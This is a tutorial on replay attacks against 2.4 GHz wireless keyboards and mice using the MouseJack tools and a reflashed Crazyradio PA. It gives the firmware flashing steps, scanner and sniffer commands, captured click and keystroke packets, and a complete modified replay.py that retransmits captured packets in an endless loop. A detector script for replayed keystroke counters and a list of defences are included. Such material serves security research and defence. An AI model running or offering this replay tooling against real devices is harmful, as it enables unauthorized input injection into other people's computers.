Wireless keyboard and mouse replay attack testing
Word count: 1211, 2025-08-22 12:22:36
Wireless keyboard and mouse replay attack testing: tutorial document
1. Introduction and background
Wireless keyboards and mice usually communicate over proprietary protocols in the 2.4 GHz ISM band. When a key is pressed or the mouse moves, the device sends the corresponding RF packet to the wireless receiver (dongle), which is how it talks to the PC. This document describes in detail how to use the mousejack project and a Crazyradio PA transceiver to analyse wireless keyboard/mouse traffic and carry out a replay attack.
2. Required hardware
2.1 Devices under test
- Logitech K220 wireless keyboard and mouse
- Logitech K400r wireless touchpad keyboard
- Dell KM714 wireless keyboard and mouse
2.2 Attack tools
- Crazyradio PA: a USB adapter with a power amplifier; with modified firmware it supports a pseudo-promiscuous mode, which simplifies sniffing and injection
- Device ID: 1915:7777 (stock), 1915:0101 (after flashing)
3. Environment setup and firmware flashing
3.1 Install dependencies
sudo apt install sdcc binutils python python-pip
pip install pyusb
pip install platformio
3.2 Fetch and flash the firmware
git clone https://github.com/bitcraze/crazyradio-firmware
cd crazyradio-firmware
Edit the timeout value in usbtools/launchBootloader.py (the value set in the original script may be too short).
Start the bootloader:
python usbtools/launchBootloader.py
Download and flash the firmware (e.g. cradio-0.53.bin):
python usbtools/nrfbootload.py flash cradio-0.53.bin
After flashing succeeds, unplug and re-plug the device; its ID should now be 1915:0101.
4. Installing MouseJack
MouseJack is a set of security vulnerabilities affecting non-Bluetooth wireless mice and keyboards from seven vendors.
4.1 Build and install
git clone --recursive https://github.com/RFStorm/mousejack.git
cd mousejack
make
make install
After installation, unplug and re-plug the device; its ID changes to 1915:0102.
4.2 Additional tool
git clone https://github.com/iamckn/mousejack_transmit
5. Replay attack workflow
5.1 Scan for wireless devices
cd nrf-research-firmware/tools
sudo python nrf24-scanner.py
Example output: a wireless mouse is found with address B0:58:31:49:A4
5.2 Sniff a specific device
sudo python nrf24-sniffer.py -a B0:58:31:49:A4
Example sniffed data:
Right button pressed
[2019-04-14 19:31:32.972] 32 10 B0:58:31:49:A4 00:C2:02:00:00:00:00:00:00:3C
[2019-04-14 19:31:32.980] 32 10 B0:58:31:49:A4 00:4F:00:00:55:00:00:00:00:5C
Right button released
[2019-04-14 19:31:34.479] 32 10 B0:58:31:49:A4 00:C2:00:00:00:00:00:00:00:3E
[2019-04-14 19:31:34.484] 32 10 B0:58:31:49:A4 00:4F:00:00:55:00:00:00:00:5C
Left button pressed
[2019-04-14 19:32:35.658] 32 10 B0:58:31:49:A4 00:C2:01:00:00:00:00:00:00:3D
[2019-04-14 19:32:35.666] 32 10 B0:58:31:49:A4 00:4F:00:00:55:00:00:00:00:5C
Left button released
[2019-04-14 19:32:36.699] 32 10 B0:58:31:49:A4 00:C2:00:00:00:00:00:00:00:3E
[2019-04-14 19:32:36.708] 32 10 B0:58:31:49:A4 00:4F:00:00:55:00:00:00:00:5C
5.3 Prepare the replay data
In the tools directory, create a pack.log file containing the packets to replay, for example a right click:
00:C2:02:00:00:00:00:00:00:3C
00:4F:00:00:55:00:00:00:00:5C
00:C2:00:00:00:00:00:00:00:3E
00:4F:00:00:55:00:00:00:00:5C
5.4 Modify the replay.py script
The official script may have a problem with its address handling and needs to be changed:
# original code (problematic)
try_address = chr(b) + address[1:]
# change to
try_address = address[0:]
Full replay.py script (key parts):
#!/usr/bin/env python
'''
This program is adapted from nrf24-network-mapper; you can
use this script to replay packets.
'''
import binascii, time
from lib import common

# Initialise arguments and the radio
common.init_args('./nrf24-network-mapper.py')
common.parser.add_argument('-a', '--address', type=str, help='Known address', required=True)
common.parser.add_argument('-p', '--passes', type=int, help='Number of passes (default 2)', default=2)
common.parser.add_argument('-k', '--ack_timeout', type=int, help='ACK timeout in microseconds, accepts [250,4000], step 250', default=500)
common.parser.add_argument('-r', '--retries', type=int, help='Auto retry limit, accepts [0,15]', default=5, choices=xrange(0, 16), metavar='RETRIES')
common.parse_and_init()

# Parse the address (sent least-significant byte first on the air, hence the reversal)
address = common.args.address.replace(':', '').decode('hex')[::-1][:5]
address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])

# Ping payload and radio timing parameters, taken from nrf24-network-mapper.py
ping_payload = '0F:0F:0F:0F'.replace(':', '').decode('hex')
ack_timeout = int(common.args.ack_timeout / 250) - 1
ack_timeout = max(0, min(ack_timeout, 15))
retries = max(0, min(common.args.retries, 15))

# Put the radio into sniffer mode
common.radio.enter_sniffer_mode(address)

# Read the packets to replay from pack.log (one hex payload per line)
def ReadPack():
    payload = []
    for line in open('pack.log'):
        payload.append(line)
    return payload

# Ping test: find the channels on which the receiver acknowledges this address
def Ping():
    channels_t = []
    for p in range(common.args.passes):
        for b in range(4):
            try_address = address[0:]  # modified address handling
            common.radio.enter_sniffer_mode(try_address)
            for c in range(len(common.args.channels)):
                common.radio.set_channel(common.args.channels[c])
                if common.radio.transmit_payload(ping_payload, ack_timeout, retries):
                    channels_t.append(common.args.channels[c])
    return channels_t

# Transmit a packet on the channels found by Ping()
def airplay(sendpayload, get_channels, data):
    for p in range(common.args.passes):
        for b in range(4):
            try_address = address[0:]
            common.radio.enter_sniffer_mode(try_address)
            for c in range(len(get_channels)):
                common.radio.set_channel(get_channels[c])
                while True:  # infinite loop: replays the packet continuously
                    if common.radio.transmit_payload(sendpayload, ack_timeout, retries):
                        print('Sending Payload:' + ' ' + data)

def run():
    get_channels = list(set(Ping()))
    payloads = ReadPack()
    for payload in payloads:
        data = payload.strip('\n')
        payload = binascii.a2b_hex(data.replace(':', ''))
        airplay(payload, get_channels, data)

if __name__ == '__main__':
    run()
5.5 Run the replay attack
sudo python replay.py -a B0:58:31:49:A4
6. Test results on different devices
6.1 Logitech K220
- Right-click packets:
  00:C2:02:00:00:00:00:00:00:3C
  00:4F:00:00:55:00:00:00:00:5C
- Spacebar packets:
  00:D3:1A:EB:F6:4C:3A:4C:77:C7:28:4F:CB:18:00:00:00:00:00:00:00:C8
  00:4F:00:00:55:00:00:00:00:5C
6.2 Logitech K400r
- Right-click packets:
  00:C2:02:00:00:00:00:00:00:3C
  00:C2:00:00:00:00:00:00:00:3E
- Spacebar packets:
  00:D3:86:00:51:75:58:39:C7:00:40:FD:10:72:00:00:00:00:00:00:00:CA
  00:D3:9C:F5:7B:D6:B1:5F:FC:08:40:FD:10:73:00:00:00:00:00:00:00:77
  00:4F:00:01:18:00:00:00:00:98
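As an added example (not from the original page or the mousejack project), the following Python 3 script parses nrf24-sniffer.py log lines like those in sections 5.2 and 6, checks the Logitech frame checksum (every captured frame above sums to zero mod 256), labels the frame type, and applies the receiver-side check that distinguishes a replayed encrypted keystroke from a live one: the 4-byte counter in bytes 10..13 must not repeat. The frame-type byte values and the counter offset come from the public MouseJack research and are assumptions here; the sample lines are constructed from the captures on this page (the K400r frames are placed on the mouse's address for illustration).

```python
import re

# Frame-type byte (payload[1]) and mouse button bits, per the public MouseJack research (assumed).
FRAME_TYPES = {0x40: "keepalive", 0x4F: "set-keepalive", 0xC1: "keystroke-plain",
               0xC2: "mouse", 0xD3: "keystroke-encrypted"}
BUTTONS = {0x01: "left", 0x02: "right", 0x04: "middle"}
# nrf24-sniffer.py line layout: [timestamp] channel length address payload
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]\s+(?P<chan>\d+)\s+(?P<length>\d+)\s+"
                     r"(?P<addr>(?:[0-9A-F]{2}:){4}[0-9A-F]{2})\s+(?P<payload>[0-9A-F:]+)$")

def parse_line(line):
    """Parse one sniffer log line into a dict, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return {"ts": m["ts"], "channel": int(m["chan"]), "length": int(m["length"]),
            "address": m["addr"], "payload": bytes.fromhex(m["payload"].replace(":", ""))}
def checksum_ok(payload):  # Logitech: the trailing byte makes all bytes sum to 0 mod 256
    return len(payload) >= 2 and sum(payload) % 256 == 0

def describe(payload):
    kind = FRAME_TYPES.get(payload[1], "unknown-0x%02X" % payload[1])
    if kind != "mouse":
        return kind
    pressed = [n for bit, n in BUTTONS.items() if payload[2] & bit]  # byte 2: button bitmask
    return "mouse " + ("+".join(pressed) if pressed else "release")
def analyse(lines):
    """Return (decoded frames, alerts). A 0xD3 frame's 4-byte counter (bytes 10..13) must be
    new per address at the receiver; a repeat is a replayed capture. Mouse frames have none."""
    seen, decoded, alerts = {}, [], []
    for pkt in filter(None, map(parse_line, lines)):
        p, who = pkt["payload"], "%s %s" % (pkt["ts"], pkt["address"])
        if len(p) != pkt["length"] or not checksum_ok(p):
            alerts.append(who + " bad length/checksum")
            continue
        if p[1] == 0xD3 and len(p) >= 14:
            counter = int.from_bytes(p[10:14], "big")
            if counter in seen.setdefault(pkt["address"], set()):
                alerts.append(who + " replayed counter 0x%08X" % counter)
            seen[pkt["address"]].add(counter)
        decoded.append(who + " " + describe(p))
    return decoded, alerts

# Constructed sample: the page's right-click frame, the K400r spacebar frames (counter
# 0x40FD1072, then 0x40FD1073) and a replayed copy of the first spacebar frame.
SAMPLE = [
    "[2019-04-14 19:31:32.972] 32 10 B0:58:31:49:A4 00:C2:02:00:00:00:00:00:00:3C",
    "[2019-04-14 19:33:01.100] 32 22 B0:58:31:49:A4 00:D3:86:00:51:75:58:39:C7:00:40:FD:10:72:00:00:00:00:00:00:00:CA",
    "[2019-04-14 19:33:01.108] 32 22 B0:58:31:49:A4 00:D3:9C:F5:7B:D6:B1:5F:FC:08:40:FD:10:73:00:00:00:00:00:00:00:77",
    "[2019-04-14 19:35:00.000] 32 22 B0:58:31:49:A4 00:D3:86:00:51:75:58:39:C7:00:40:FD:10:72:00:00:00:00:00:00:00:CA",
]
```

Running analyse(SAMPLE) flags only the last line (repeated counter 0x40FD1072); the unencrypted mouse frames carry no counter, which is why a replayed click is indistinguishable from a real one at the receiver.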
6.3 Unusual behaviour of the Dell KM714
When scanning with nrf24-network-mapper.py, the keyboard and mouse stop working, and the receiver has to be unplugged and re-plugged before they recover. This may be specific behaviour of the device firmware.
7. Defensive recommendations
- Use encrypted devices: choose wireless keyboards and mice that support encrypted communication
- Physical isolation: use wired devices in sensitive environments
- Firmware updates: keep device firmware up to date
- Distance: place the receiver away from potential attackers
- Use Bluetooth devices: the Bluetooth protocol is generally more secure than proprietary 2.4 GHz protocols
8. Summary
This document has described in detail how to use a Crazyradio PA and the mousejack project to carry out replay attacks against wireless keyboards and mice. The key steps are:
- preparing the hardware and flashing the firmware
- scanning and sniffing wireless keyboard/mouse traffic
- capturing and analysing packets
- modifying and running the replay script
- testing and adjusting for different devices
By understanding these attack techniques, security researchers can better assess and defend against the security risks of wireless input devices.